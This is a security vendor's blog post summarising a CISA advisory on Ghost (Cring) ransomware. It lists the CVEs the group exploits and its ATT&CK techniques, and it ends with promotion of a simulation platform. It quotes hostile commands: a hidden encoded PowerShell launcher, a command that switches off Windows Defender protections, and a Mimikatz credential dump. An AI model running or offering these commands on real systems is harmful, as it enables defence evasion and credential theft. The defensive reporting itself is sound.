.svg)
.svg)
On February 19, 2025, the Cybersecurity and Infrastructure Security Agency (CISA) released a joint advisory on Ghost (Cring) ransomware [1]. Ghost ransomware emerged in early 2021 and gained notoriety by compromising vulnerable internet-facing services using known vulnerabilities. According to CISA, Ghost threat actors are financially motivated and have compromised organizations across more than 70 countries.
In this blog post, we explain the Tactics, Techniques, and Procedures (TTPs) used by Ghost (Cring) ransomware and how organizations can defend themselves against Ghost ransomware attacks.
Simulate Ransomware Threats with 14-Day Free Trial of Picus Platform
Ghost (Cring) Ransomware
Ghost (Cring) ransomware first appeared in early 2021 as a financially motivated threat group. Although the group originated in China, the threat actors indiscriminately target any organizations with vulnerable public-facing services or assets. So far, Ghost ransomware impacted organizations across more than 70 countries, including organizations in China.
Ghost ransomware operators are known to rotate their ransomware payloads, ransom notes, and file extensions for encrypted files. These changes in their operations led security professionals to associate them with other ransomware groups such as Cring, Crypt3r, Hello, HsHarada, Phantom, Rapture, Strike, and Wickrme.
Ghost threat actors often employ exploiting known and critical vulnerabilities found in internet-facing assets such as Fortinet FortiOS appliances, servers running Adobe Cold Fusion, Microsoft SharePoint, and Microsoft Exchange to gain initial access. After initial access, adversaries deploy webshells and Cobalt Strike beacons to establish persistence. Afterward, they use Mimikatz to dump credentials or exploit known privilege escalation vulnerabilities to elevate their privileges and move laterally to other systems in the target network. Prior to encryption, Ghost threat actors exfiltrate the victims' sensitive information and delete shadow volume copies. These actions prevent their victims from recovering their data and pressure them into paying ransom for the decryption key.
Ghost (Cring) Ransomware Analysis and MITRE ATT&CK TTPs
Initial Access
T1190 Exploit Public Facing Applications
Ghost threat actors exploit known and critical vulnerabilities listed below to gain initial access to target organizations. Organizations are advised to patch their vulnerable assets as soon as possible.
|
Affected Product |
Vulnerability |
CVSS Score |
|
Fortinet FortiOS and FortiProxy |
CVE-2018-13379 |
9.8 (Critical) |
|
Adobe ColdFusion |
CVE-2010-2861 |
9.8 (Critical) |
|
CVE-2009-3960 |
6.5 (Medium) |
|
|
Microsoft SharePoint |
CVE-2019-0604 |
9.8 (Critical) |
|
Microsoft Exchange (ProxyShell) |
CVE-2021-34473 |
9.1 (Critical) |
|
CVE-2021-34523 |
9.0 (Critical) |
|
|
CVE-2021-31207 |
6.6 (Medium) |
Execution & Lateral Movement
T1047 Windows Management Instrumentation & 1059.001 Command and Scripting Interpreter: PowerShell
Adversaries use Windows Management Instrumentation and encoded PowerShell commands to deploy Cobalt Strike beacon in remote systems.
|
//Encoded PowerShell command powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcAL… |
Persistence
T1136 Create Account & T1098 Account Manipulation
Adversaries create new accounts or change the passwords of existing accounts to establish persistent access to the compromised network.
T1505.003 Web Shell
Ghost threat actors deploy a variation of Chunk-Proxy as a webshell. The deployed webshell allows adversaries to execute commands remotely and establish persistence in the compromised system.
Privilege Escalation
T1068 Exploitation for Privilege Escalation
Adversaries use open-source tools and known vulnerabilities to elevate their privileges.
-
SharpZeroLogon: SharpZeroLogon is a C# implementation of the ZeroLogon (CVE-2020-1472) exploit, which targets a critical vulnerability in the Netlogon Remote Protocol (MS-NRPC). ZeroLogon allows an attacker to escalate privileges to the domain administrator by exploiting cryptographic flaws in the authentication process of domain controllers running vulnerable versions of Windows Server.
-
SharpGPPPass: SharpGPPPass is a C# tool used to extract Group Policy Preferences (GPP) passwords from SYSVOL shares in Active Directory environments. It automates the process of locating and decrypting credentials stored in GPP XML files, which were historically used by administrators to deploy local user accounts, service account credentials, and other settings across Windows systems.
-
BadPotato: BadPotato exploits insecure permissions and token manipulation in Windows privilege escalation paths. Specifically, it takes advantage of weak DCOM (Distributed Component Object Model) permissions to escalate privileges from a low-privileged user to SYSTEM or even domain administrator under certain conditions.
-
GodPotato: GodPotato exploits insecure DCOM authentication and token impersonation in Windows to achieve local privilege escalation (LPE) to SYSTEM. Like other "Potato" exploits (e.g., RottenPotato, JuicyPotato, BadPotato), it takes advantage of NTLM relay attacks combined with token impersonation to escalate privileges.
Defense Evasion
T1562.001 Impair Defenses: Disable or Modify Tools
Ghost operators disable antivirus products and Windows Defender to execute their malicious commands and payloads without being detected.
|
Set-MpPreference -DisableRealtimeMonitoring 1 -DisableIntrusionPreventionSystem 1 -DisableBehaviorMonitoring 1 -DisableScriptScanning 1 -DisableIOAVProtection 1 -EnableControlledFolderAccess Disabled -MAPSReporting Disabled -SubmitSamplesConsent NeverSend |
Credential Access
T1003 OS Credential Dumping
Ghost threat actors use Mimikatz on Windows systems to dump credentials.
|
mimikatz "privilege::debug" "sekurlsa::logonpasswords" |
Discovery
Adversaries use the following tools and commands to discover running processes in compromised systems, remote systems, domain accounts, and network shares.
-
T1018 Remote System Discovery: Adversaries use Ladon 911 and SharpNBTScan to discover remote systems.
-
T1057 Process Discovery: Adversaries use the ps command to list running processes.
-
T1135 Network Share Discovery: Adversaries use SharpShares to discover network shares.
-
T1087.002 Domain Account Discovery: Adversaries use the following command to list domain administrator accounts.
|
net group "Domain Admins" /domain |
Command and Control (C2)
T1071.001 Web Protocols
Adversaries use Cobalt Strike beacon and Cobalt Strike Team Servers to communicate with compromise systems via HTTP and HTTPS protocols.
T1105 Ingress Tool Transfer
Ghost operators use their C2 servers to transfer malicious tools and ransomware payloads to the victim's network.
T1132 Standard Encoding
Ghost operators use encoded PowerShell commands to evade defenses during their lateral movement attacks.
T1573 Encrypted Channel
Ghost operators use encrypted emails to hide the content of their communications.
Exfiltration
T1041 Exfiltration Over C2 Channel
Adversaries use the deployed webshells and Cobalt Strike beacons to exfiltrate data from the compromised systems.
T1567.002 Exfiltration to Cloud Storage
Adversaries use cloud storage providers such as mega.nz to exfiltrate their victims' sensitive data for double extortion.
Impact
T1486 Data Encrypted for Impact
Ghost operators use various ransomware payloads such as Cring.exe, Ghost.exe, ElysiumO.exe, and Locker.exe to encrypt their victims' files and directories. The encrypted files are appended with a ransom file extension.
T1490 Inhibit System Recovery
Adversaries delete volume shadow copies and prevent their victims from recovering their encrypted files.
How Picus Helps Simulate Ghost (Cring) Ransomware Attacks?
We also strongly suggest simulating Ghost (Cring) ransomware attacks to test the effectiveness of your security controls against real-life cyber attacks using the Picus Security Validation Platform. You can also test your defenses against hundreds of other ransomware variants, such as RansomHub, Black Cat, and ALPHV, within minutes with a 14-day free trial of the Picus Platform.
Picus Threat Library includes the following threats for Ghost (Cring) ransomware:
|
Threat ID |
Threat Name |
Attack Module |
|
39164 |
Ghost (Cring) Threat Group Campaign |
Windows Endpoint |
|
73928 |
Cring Ransomware Download Threat |
Network Infiltration |
|
43444 |
Cring Ransomware Email Threat |
Email Infiltration (Phishing) |
Picus also provides actionable mitigation content. Picus Mitigation Library includes prevention signatures to address Ghost (Cring) ransomware and other ransomware attacks in preventive security controls. Currently, Picus Labs validated the following signatures for Ghost (Cring) ransomware:
|
Security Control |
Signature ID |
Signature Name |
|
Check Point NGFW |
0CF4A1229 |
Trojan.Win32.Cring.TC.5200DvMX |
|
Cisco FirePower |
Win.Ransomware.Bulz::in03.talos |
|
|
Forcepoint NGFW |
|
File_Malware-Blocked |
|
Fortigate AV |
8279374 |
MSIL/Filecoder.AEJ!tr.ransom |
|
Palo Alto |
407112639 |
trojan/Win32 EXE.filecoder.aiy |
|
Trellix |
0x4840c900 |
MALWARE: Malicious File Detected by GTI |
Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Security Validation Platform.
References
[1] "#StopRansomware: Ghost (Cring) Ransomware," Cybersecurity and Infrastructure Security Agency CISA. Available: https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-050a
Share this:
